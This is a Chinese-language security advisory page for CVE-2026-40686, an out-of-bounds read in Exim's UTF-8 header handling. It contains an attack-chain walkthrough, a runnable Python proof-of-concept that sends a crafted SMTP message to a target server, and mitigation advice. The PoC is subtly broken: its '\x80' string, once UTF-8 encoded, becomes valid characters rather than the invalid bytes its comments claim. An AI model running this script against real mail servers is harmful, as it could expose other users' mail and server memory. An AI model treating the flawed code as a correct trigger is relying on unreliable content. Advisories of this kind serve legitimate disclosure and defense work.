CVE-2026-40686 CVSS 3.7 低危

CVE-2026-40686 Exim越界读取信息泄露漏洞

披露日期: 2026-04-30

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40686

漏洞类型

越界读取

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Exim

漏洞概述

该漏洞影响Exim 4.99.2之前的所有版本。当系统启用utf8运算符时，攻击者可发送包含畸形UTF-8头部数据（特别是大型尾随字符）的恶意邮件。这会导致Exim在处理过程中发生越界读取。虽然不导致代码执行，但攻击者可能利用此漏洞在错误消息中获取内存敏感信息，CVSS评分为3.7，属于低危风险。

技术细节

该漏洞源于Exim邮件传输代理在解析特定邮件头部时的逻辑错误。当Exim配置中启用了UTF-8运算符（例如在过滤规则中使用${utf8...}），且传入的SMTP邮件头部包含格式错误的UTF-8数据时，解析器未能正确计算边界。具体而言，如果UTF-8字符的尾随字节长度异常且未经过严格校验，程序会尝试读取超出预定缓冲区范围的内存地址。这种越界读取操作虽然通常不会导致服务进程崩溃或执行任意代码，但存在信息泄露风险。在后续处理不相关邮件消息或生成退信错误时，程序可能会将读取到的内存数据拼接到错误日志或响应消息中。攻击者无需身份认证即可通过网络发送特制邮件触发此漏洞，进而获取服务器内存中的敏感片段，如邮件内容、配置信息或其他用户的通信数据。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器运行的是Exim邮件传输代理，并确认其启用了utf8运算符功能。

STEP 2

构造恶意数据

攻击者构造一封特制的电子邮件，其中包含格式错误的UTF-8头部数据，特别是包含大型且无效的UTF-8尾随字符序列。

STEP 3

发送Payload

攻击者通过SMTP协议将构造好的恶意邮件发送给目标Exim服务器。

STEP 4

触发漏洞

Exim在解析邮件头部时，由于未能正确校验UTF-8字符长度，导致解析器发生越界读取操作，访问了预期之外的内存区域。

STEP 5

信息泄露

服务器在处理该邮件或生成相关的错误消息（如退信通知）时，将越界读取到的内存片段包含在输出中，返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# PoC for CVE-2026-40686
# Sending malformed UTF-8 headers to trigger out-of-bounds read

def send_exploit(target_ip, target_port):
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        s.recv(1024)  # Receive banner

        # Construct payload with malformed UTF-8 trailing characters
        # Using a long sequence of invalid continuation bytes
        malformed_header = "Subject: " + "\x80" * 200 + "\r\n"

        payload = (
            "EHLO pwn.example.com\r\n"
            "MAIL FROM: <attacker@local>\r\n"
            "RCPT TO: <postmaster@local>\r\n"
            "DATA\r\n"
            "From: <attacker@local>\r\n"
            "To: <postmaster@local>\r\n"
            + malformed_header +
            "\r\n"
            "Test body\r\n"
            ".\r\n"
            "QUIT\r\n"
        )

        s.send(payload.encode('utf-8'))
        response = s.recv(4096)
        print("[*] Payload sent.")
        print("[*] Response from server:")
        print(response.decode('utf-8', errors='ignore'))
        s.close()

    except Exception as e:
        print(f"Error: {e}")

if __name__ == "__main__":
    # Usage: python script.py <target_ip> <port>
    if len(sys.argv) > 2:
        send_exploit(sys.argv[1], int(sys.argv[2]))
    else:
        send_exploit("127.0.0.1", 25)

影响范围

Exim < 4.99.2

防御指南

临时缓解措施

建议立即检查Exim配置，若业务不需要utf8运算符，应将其禁用。同时，应关注Exim官方发布的补丁公告，尽快进行版本升级以修补此越界读取漏洞。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表